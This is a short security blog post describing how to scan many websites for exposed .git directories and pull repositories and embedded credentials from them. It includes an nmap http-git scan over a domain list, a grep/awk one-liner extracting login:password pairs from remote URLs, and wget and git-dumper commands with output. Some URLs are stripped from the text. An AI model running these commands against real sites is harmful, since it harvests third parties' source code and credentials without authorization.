Gathering some information from web exposed GIT repositories

    Hello folks,

    Last week, while i was doing recon on some websites, i noticed that we can still found some versioning repositories in production. I found some classic .git exposed, and in a lesser extent some .svn directories. I decided to gather a bunch of websites caught in the TOP Alexa in order to look for the proportion of .git exposed; with 112332 domains scanned (mixed TLDs), i found 453 .git exposed, which is only 0.4%. Not bad.

    How to scan for web exposed git directories:
    nmap --open -PN -n -p80,81,82,8000,8080,443,8443,9443 --script http-git -oA http-git -iL domains.lst

    N.B: this NSE script will perform HTTP requests thanks to input FQDNs (vhosting)

    Some developers may clone repository specifying their login and password as part of the url, setting this remote origin in the git configuration. For example, once your nmap done, you can spot some login:password playing with this command:

    $ grep -A1 Remotes http-git.nmap | grep -E ":.*:[^:]*@.*" | awk '{print $2}'

    However i was looking for other information, for example:

    • repository’s activity; last commit date for each branch
    • repo directory traversal (great to download the whole repo)
    • highlights remote url
    • displays .git/config and .gitignore files

    Knowing a bit of a .git repository layout will allow to easily retrieve this information even if you don’t have any directory traversal.
    That’s why i created a bash script gathering this information which you can find here.


    If a repository seems interesting and has directory traversal and/or leaks in its remote url some credentials, you can simply download or clone the repository. For example to download the whole repo you can do the following:

    $ wget --recursive --no-parent http://localhost/ && \
    cd localhost/ && \
    git reset --hard

    Now what happens if you didn’t find any creds (most of the cases) and directory traversal is not enabled ? I will not reinvent the wheel and advice you to read this article amongst others.

    $ curl -I http://localhost/
    HTTP/1.1 403 Forbidden
    Date: Sat, 11 Aug 2018 17:00:04 GMT
    Server: Apache/2.4.33 (Debian)
    Content-Type: text/html; charset=iso-8859-1

    I gave a try to another git dumper tool:

    $ git clone && cd git-dumper
    $ pip install -r requirements.txt
    $ ./ http://localhost/ /tmp/repo
    [-] Testing http://localhost/ [200]
    [-] Testing http://localhost/ [403]
    [-] Fetching common files
    [-] Fetching http://localhost/ [200]
    [-] Fetching http://localhost/ [200]
    [-] Fetching http://localhost/ [200]
    [-] Fetching http://localhost/ [302]
    [-] Fetching http://localhost/ [302]
    [-] Fetching http://localhost/ [200]
    [-] Fetching http://localhost/ [200]
    [-] Fetching http://localhost/ [200]
    [-] Running git checkout .

    We can now inspect our freshly rebuilt repository:

    $ cd /tmp/repo && ls -1

    See you soon,